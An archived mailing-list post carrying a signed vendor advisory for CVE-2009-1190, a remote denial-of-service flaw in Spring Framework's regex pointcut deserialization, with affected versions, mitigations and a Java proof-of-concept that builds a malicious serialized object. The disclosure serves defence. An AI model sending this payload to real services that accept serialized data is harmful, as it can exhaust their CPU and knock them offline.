[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>, "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
- From: Mark Thomas <Mark.Thomas@xxxxxxxxxxxxxxxx>
- Date: Fri, 24 Apr 2009 03:51:35 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Severity: Low
Vendor: SpringSource
Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6
JDK)
Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with
exponential compilation times, when using optional groups. A workaround [3] was
implemented in 1.4.2_06 but the root cause of poor performance in regex
processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited
readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven
application with spring.jar in its classpath accepts serializable data, an
attacker could use a long regex string with many optional groups to consume
enormous CPU resources. And, with a few requests all listeners will be occupied
with compiling regex expressions forever.
Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for
the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that
includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a
workaround to the root cause; The software can be found in the Customer Portal
[5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround
to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar
with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released
shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the
root cause will be released by April 27, 2009
Example:
public class DoSSpring {
static byte[] getSerialized(Object o) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
oos.flush();
oos.close();
return baos.toByteArray();
}
public static void main(String[] a) throws Exception{
String thePattern="(Y)?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" +
"?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" +
"?(W)?(I)?(U)?(a)?$";
String longerPattern =
thePattern.substring(0,thePattern.length()-1)+thePattern;
int length = longerPattern.length();
String fakePattern = longerPattern.replaceAll(".", "A");
JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
jrmp.setPattern(fakePattern);
System.out.println(jrmp);
byte[] theArray = getSerialized(jrmp);
int i = 0;
for (; i < theArray.length;i++) {
if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {
break;
}
}
System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);
ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = ois.readObject(); // returns after a very very long time
}
}
Credit:
This issue was discovered by the RedHat Security Response Team
References:
[1]
http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAknxfZcACgkQb7IeiTPGAkMX0gCdGsE5fqOd0PcMdcYrLTwyejGp
4p0An1Dwr9T+WsCwytVrztkskexVw84T
=zBj5
-----END PGP SIGNATURE-----